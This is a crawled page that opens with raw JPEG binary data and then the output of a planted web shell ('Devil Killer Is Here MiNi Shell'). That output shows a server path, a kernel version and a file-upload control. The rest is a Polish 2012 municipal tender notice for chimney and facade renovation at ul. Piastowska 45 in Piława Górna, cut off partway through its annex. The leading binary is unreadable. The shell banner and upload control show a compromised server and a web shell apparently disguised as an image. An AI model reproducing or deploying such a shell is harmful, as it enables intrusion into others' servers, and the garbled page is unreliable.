JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120829/320892-N-2012.html

<p class="kh_header"><b>Piława Górna: Renowacja zespołu budynków mieszkalnych zlokalizowanych w Piławie Górnej                przy ul. Piastowskiej nr 9, 11A, 25, 27, 33, 45, 52,  67. w ramach Priorytetu 9, Działanie 9.2.
Część 1. Przemurowanie kominów na dachu przy ul. Piastowskiej 45 w Piławie Górnej.
Część 2. Wymiana tynków elewacji przy ul. Piastowskiej 45 w Piławie Górnej.</b><br>
<b>Numer ogłoszenia: 320892 - 2012; data zamieszczenia: 29.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Piława Górna , ul. Piastowska 29, 58-240 Piława Górna, woj. dolnośląskie, tel. 074 8324934, faks 074 8371386.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pilawagorna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Renowacja zespołu budynków mieszkalnych zlokalizowanych w Piławie Górnej                przy ul. Piastowskiej nr 9, 11A, 25, 27, 33, 45, 52,  67. w ramach Priorytetu 9, Działanie 9.2.
Część 1. Przemurowanie kominów na dachu przy ul. Piastowskiej 45 w Piławie Górnej.
Część 2. Wymiana tynków elewacji przy ul. Piastowskiej 45 w Piławie Górnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowych i renowacyjnych w budynku mieszkalnym przy ul. Piastowskiej 45 w Piławie Górnej. 
Budynek położony jest na działce nr ewidencyjny 151, Obręb Kopanica, teren na którym jest usytuowany jest oznaczony w Miejscowym Planie Zagospodarowania Przestrzennego Gminy Piława Górna (dalej MPZP) symbolem B-19MW i objęty strefą B ochrony konserwatorskiej. Budynek jest wpisany do gminnej ewidencji zabytków (Uchwała nr 229/XLV/2010 RM Piławy Górnej z dnia 25.08.2010 w sprawie uchwalenia MPZP dzielnicy śródmiejskiej Piławy Górnej 
http://pilawagorna.bip.ornak.pl/pl/bip/prawo_lokalne/uchwaly_rady_miejskiej/2010/25_08_2010/u_229_xlv_2010/px_u_229_2010.pdf  (strona 37)).
Budynek wolnostojący z roku 1888 w stylu klasycystycznym, murowany z cegły, czworoboczny, całkowicie podpiwniczony, o trzech kondygnacjach nadziemnych. Budynek z dachem płaskim o niewielkim spadku krytym papą.
Zakres wykonania robót obejmuje:
1.	Część I. Przemurowanie kominów na dachu i obejmuje m.in.:
1)	przemurowanie kominów z cegły klinkierowej - na wszystkich kominach ponad dachem płaskim, a także wyrównanie wysokości dwóch stykających się ze sobą kominów sąsiednich (zwiększenie wysokości komina niższego), wszystkie kominy wykończyć czapami granitowymi;
2)	pokrycie dachów papą termozgrzewalną przy kominach - paski z blachy tytan-cynk na styku kominów i papy;
3)	wykonanie obróbek blacharskich - paski z blachy tytan-cynk na styku ogniomuru i papy;
4)	rozebranie obróbki ogniomuru na dachu z dachówki karpiówki i wykonanie obróbki z blachy tytan-cynk;
5)	posmarowanie powierzchni dachu masą uszczelniającą z zakitowaniem uszkodzeń;
6)	posypanie nawierzchni dachu piaskiem,
7)	wywiezienie odpadów.
2.	Część II. Remont elewacji obejmuje m.in.:
1)	rozstawienie rusztowań ramowych elewacyjnych, wykonanie osłon z siatki na rusztowaniach zewnętrznych, wykonanie osłon okien, wykonanie daszków ochronnych ciągłych wolnostojących nad przejściami;
2)	odbicie tynków z zaprawy cementowo-wapiennej, przygotowanie starego podłoża, impregnacja elewacji - smarowanie jednokrotne powierzchnie tynków system tynków renowacyjnych WTA;
3)	wyprawy tynkarskie renowacyjne WTA wykonywane na zawilgoconych i/lub zasolonych ścianach sposobem ręcznym; tynk dwuwarstwowy grubości 20+15=30 mm, pierwsza warstwa z tyku podkładowego, druga z tynku wykończeniowego. Tynki cokołu. Tynki ścian.
4)	tynki WTA zewn. profili ciągnionych zwykłych o szer. do 40 cm z przygotowaniem zaprawy, o szer. do 20 cm z przygotowaniem zaprawy, tynki zewn. profili ciągnionych zwykłych o szer. do 10 cm z przygotowaniem zaprawy. Tynki boniowane;
5)	rozebranie parapetów z płytek na zaprawie cementowej, 
6)	spadki pod obróbki blacharskie z zaprawy, 
7)	okładziny półek, parapetów i lad z płytek klinkierowych na zaprawie klejowej o grub. warstwy 4 mm;
8)	malowanie tynków renowacyjnych dwukrotnie - aplikacja ręczna farby silikatowe ;
9)	wymiana pokrycia murów ogniowych, pasów pod-i nadrynnowych, wyskoków i pasów elew., gzymsów i krawędzi balkonowych z blachy tytan-cynk;
10)	rozebranie rur spustowych z blachy nadającej się do użytku, uzupełnienie rur spustowych okrągłych w odcinkach ponad 1.0 m z blachy ocynkowanej o śr. 12 cm;
11)	rozebranie podłoża z betonu żwirowego o grubości do 5 cm - opaski betonowe, wykonanie nowej opaski betonowej wokół budynku, naprawa studni okien piwnicznych, wykonanie ścieków wód opadowych wokół budynku z kostki betonowej gr. 8cm podsypce cementowo-piaskowej;
12)	remont schodów wejściowych do budynku;
13)	wykonanie instalacji odgromowej;
14)	odtworzenie zieleni zniszczonej podczas prowadzenia robót;
15)	wywiezienie gruzu.
16)	montaż na ścianie frontowej budynku tablicy informacyjnej po zakończeniu robót w miejscu wskazanym przez Zamawiającego.
17)	montaż na ścianach budynku dwóch stelaży do zawieszania anten satelitarnych (stelaż składa się z rury stalowej ocynkowanej i dwóch mocowań stalowych ocynkowanych po obu jej końcach; umocowana pionowo rura pomiędzy przykręconymi do ściany zaczepami stanowi bazę do montażu anten). Miejsca montażu stelaży zostaną wskazane przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 63.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w  niniejszym postępowaniu nie będzie żądał wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawcę warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia: 
a)	dla Części I w oparciu o wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia -  minimum 2 zadania  zbieżne z przedmiotem zamówienia, obejmujące budowę, przebudowę, remonty przewodów kominowych lub wykonanie robót budowlanych lub robót dekarskich, których zakres obejmował m.in. budowę, przebudowę lub remonty przewodów kominowych. Roboty te musiały być wykonywane zgodnie z obowiązującymi w tym zakresie przepisami, normami i sztuką budowlaną. Wartość robót nie niższa niż  10  000 zł brutto każda - wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dokumentami potwierdzającymi taki stan rzeczy są dla Zamawiającego referencje lub protokoły odbioru robót.
b)	dla Części II w oparciu o wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia -  minimum 2 roboty zbieżne z przedmiotem zamówienia obejmujące wymianę, wykonanie lub remont tynków elewacji, wykonane zgodnie z obowiązującymi w tym zakresie przepisami, normami i sztuka budowlaną, o wartości nie niższej niż 140 000 zł brutto każda - wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dokumentami potwierdzającymi taki stan rzeczy są dla Zamawiającego referencje lub protokoły odbioru robót
c)	dla Wykonawcy składającego ofertę obejmującą obie części przedmiotu zamówienia w oparciu o wykaz zrealizowanych zadań w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia  - minimum 2 zadania zbieżne z przedmiotem zamówienia obejmujące wykonanie robót budowlanych obejmujących budowę, przebudowę lub remonty przewodów kominowych i wentylacyjnych oraz wymianę, wykonanie lub remont tynków elewacji, wykonane zgodnie z obowiązującymi w tym zakresie przepisami, normami i sztuka budowlaną, łącznie wymagania dla Części I i Części II - wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że zadania zostały wykonane należycie i prawidłowo ukończone. Dokumentami potwierdzającymi taki stan rzeczy są dla Zamawiającego referencje lub protokoły odbioru robót</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o oświadczenie, że Wykonawca dysponuje odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  tj uprawnienia kierownika budowy w zakresie pełnienia samodzielnych funkcji technicznych w budownictwie - kierowania robotami budowlanymi w rozumieniu ustawy Prawo Budowlane (Dz.U. 2010 nr 243 poz. 1623, z późn. zm.)  lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a także są członkami właściwej Izby Samorządu Zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz ofertowy przedstawiający ceny za wykonanie robót określonych w SIWZ - załącznik nr 1 do SIWZ (Jeżeli Wykonawca składa ofertę obejmującą tylko jedną część przedmiotu zamówienia, podaje cenę tylko dla tej części).
Załącznik cenowy, który stanowi kalkulację ceny oferty i jest przygotowywany przez Wykonawcę  jako propozycja wynagrodzenia za wykonanie przedmiotu zamówienia sporządzony na podstawie oględzin budynku, dokumentacji projektowej i pomocniczo  przedmiaru robót. Wykonawca sporządza załącznik cenowy dla części zamówienia, na którą składa ofertę.
Wykonawca musi uwzględnić wykonanie innych, nie wymienionych w opisie przedmiotu zamówienia robót, które są niezbędne do zrealizowania przedmiotu zamówienia z godnie z dokumentacją projektową, obowiązującymi przepisami i zasadami sztuki budowlanej
Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną  do reprezentowania Wykonawcy dla Części I przedmiotu zamówienia - załącznik nr 5 do SIWZ.
Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną do reprezentowania Wykonawcy dla Części II przedmiotu zamówienia - załącznik nr 6 do SIWZ (W zależności od tego, czy Wykonawca składa ofertę na obie lub na jedną część przedmiotu zamówienia - załącza do oferty zaakceptowane oba lub jeden projekt umowy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza w trybie art. 144 Ustawy Pzp możliwość zmiany postanowień zawartej umowy w zakresie:
1) zmiany terminu wykonania umowy, o którym mowa w § 2 Umowy w przypadku zaistnienia okoliczności niezależnych od Wykonawcy po ich uwzględnieniu przez Zamawiającego,  szczególnie w przypadku:
a) zmiany dokumentacji technicznej, której nie dało się przewidzieć w dniu otwarcia ofert, a jest konieczna dla uzyskania efektu końcowego i która wymaga zmiany pozwolenia na budowę,
b) zmian dokonanych na podst. art. 20 ust.1 pkt. 4 lit. b Prawo budowlane - rozwiązania
 zamienne,
c) jeżeli zmiany zostały dokonane podczas wykonywania robót, które nie powodują   
    odstąpienia w sposób istotny od zatwierdzonego projektu - art. 36a ust. 5 ustawy   
    Prawo budowlane,
d) jeżeli powstały opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez lub dające się _przypisać Zamawiającemu, personelowi Zamawiającego, lub innemu  
    wykonawcy zatrudnionego przez Zamawiającego na terenie budowy,
e) siły wyższej,
2) zmiany zakresu rzeczowego robót budowlanych wynikających z przyczyn nie leżących 
 po stronie Zamawiającego i Wykonawcy i nie powodujące zmiany wysokości 
 wynagrodzenia Wykonawcy w szczególności zatwierdzonych projektem budowlanym 
 zamiennym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pilawagorna.bip.ornak.pl/pl/bip/przetargi/ogloszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piława Górna
ul. Piastowska 29
58-240 Piława Górna
pok. nr 19 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2012 godzina 10:00, miejsce: Urząd Miasta Piława Górna
ul. Piastowska 29
58-240 Piława Górna
pok. nr 19 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Renowacja zespołu budynków mieszkalnych zlokalizowanych w Piławie Górnej przy ul. Piastowskiej nr 9, 11A, 25, 27, 33, 45, 52,  67. w ramach Priorytetu 9, Działanie 9.2.
Część 1. Przemurowanie kominów na dachu przy ul. Piastowskiej 45 w Piławie Górnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowych i renowacyjnych w budynku mieszkalnym przy ul. Piastowskiej 45 w Piławie Górnej. 
Budynek położony jest na działce nr ewidencyjny 151, Obręb Kopanica, teren na którym jest usytuowany jest oznaczony w Miejscowym Planie Zagospodarowania Przestrzennego Gminy Piława Górna (dalej MPZP) symbolem B-19MW i objęty strefą B ochrony konserwatorskiej. Budynek jest wpisany do gminnej ewidencji zabytków (Uchwała nr 229/XLV/2010 RM Piławy Górnej z dnia 25.08.2010 w sprawie uchwalenia MPZP dzielnicy śródmiejskiej Piławy Górnej 
http://pilawagorna.bip.ornak.pl/pl/bip/prawo_lokalne/uchwaly_rady_miejskiej/2010/25_08_2010/u_229_xlv_2010/px_u_229_2010.pdf  (strona 37)).
Budynek wolnostojący z roku 1888 w stylu klasycystycznym, murowany z cegły, czworoboczny, całkowicie podpiwniczony, o trzech kondygnacjach nadziemnych. Budynek z dachem płaskim o niewielkim spadku krytym papą.
Zakres wykonania robót obejmuje:
1.	Część I. Przemurowanie kominów na dachu i obejmuje m.in.:
1)	przemurowanie kominów z cegły klinkierowej - na wszystkich kominach ponad dachem płaskim, a także wyrównanie wysokości dwóch stykających się ze sobą kominów sąsiednich (zwiększenie wysokości komina niższego), wszystkie kominy wykończyć czapami granitowymi;
2)	pokrycie dachów papą termozgrzewalną przy kominach - paski z blachy tytan-cynk na styku kominów i papy;
3)	wykonanie obróbek blacharskich - paski z blachy tytan-cynk na styku ogniomuru i papy;
4)	rozebranie obróbki ogniomuru na dachu z dachówki karpiówki i wykonanie obróbki z blachy tytan-cynk;
